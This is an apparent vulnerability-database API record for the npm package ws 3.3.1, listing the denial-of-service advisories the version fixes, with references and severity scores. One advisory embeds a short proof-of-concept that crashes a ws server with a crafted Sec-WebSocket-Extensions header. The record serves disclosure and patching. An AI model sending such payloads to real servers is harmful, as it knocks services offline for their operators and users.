Package Instance
Look up vulnerable packages by Package URL (purl).
GET /api/packages/53597?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "type": "npm", "namespace": "", "name": "ws", "version": "3.3.1", "qualifiers": {}, "subpath": "", "is_vulnerable": false, "next_non_vulnerable_version": "5.2.4", "latest_non_vulnerable_version": "8.20.1", "affected_by_vulnerabilities": [], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/11892?format=api", "vulnerability_id": "VCID-4851-mkc2-pqdw", "summary": "Denial of Service\nA specially crafted value of the `Sec-WebSocket-Extensions` header that uses `Object.prototype` property names as extension or parameter names can be used to make a `ws` server crash.", "references": [ { "reference_url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "reference_url": "https://github.com/websockets/ws/releases/tag/3.3.1", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/websockets/ws/releases/tag/3.3.1" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" } ], "aliases": [ "GMS-2017-331" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4851-mkc2-pqdw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/13656?format=api", "vulnerability_id": "VCID-4u5m-kp7t-x3cf", "summary": "Denial of Service in ws\nAffected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent.\n\n## Proof of 
concept\n\n```\nconst WebSocket = require('ws');\nconst net = require('net');\n\nconst wss = new WebSocket.Server({ port: 3000 }, function () {\n const payload = 'constructor'; // or ',;constructor'\n\n const request = [\n 'GET / HTTP/1.1',\n 'Connection: Upgrade',\n 'Sec-WebSocket-Key: test',\n 'Sec-WebSocket-Version: 8',\n `Sec-WebSocket-Extensions: ${payload}`,\n 'Upgrade: websocket',\n '\\r'\n ].join('\\r');\n\n const socket = net.connect(3000, function () {\n socket.resume();\n socket.write(request);\n });\n});\n```\n\n\n## Recommendation\n\nUpdate to version 3.3.1 or later.", "references": [ { "reference_url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a" }, { "reference_url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407" }, { "reference_url": "https://nodesecurity.io/advisories/550", "reference_id": "", "reference_type": "", "scores": [], "url": "https://nodesecurity.io/advisories/550" }, { "reference_url": "https://snyk.io/vuln/npm:ws:20171108", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 
"https://snyk.io/vuln/npm:ws:20171108" }, { "reference_url": "https://www.npmjs.com/advisories/550", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/550" }, { "reference_url": "https://www.npmjs.com/advisories/550/versions", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/advisories/550/versions" }, { "reference_url": "https://github.com/advisories/GHSA-5v72-xg48-5rpm", "reference_id": "GHSA-5v72-xg48-5rpm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5v72-xg48-5rpm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/57135?format=api", "purl": "pkg:npm/ws@1.1.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@1.1.5" }, { "url": "http://public2.vulnerablecode.io/api/packages/53597?format=api", "purl": "pkg:npm/ws@3.3.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" } ], "aliases": [ "GHSA-5v72-xg48-5rpm", "GMS-2019-145" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4u5m-kp7t-x3cf" } ], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/ws@3.3.1" }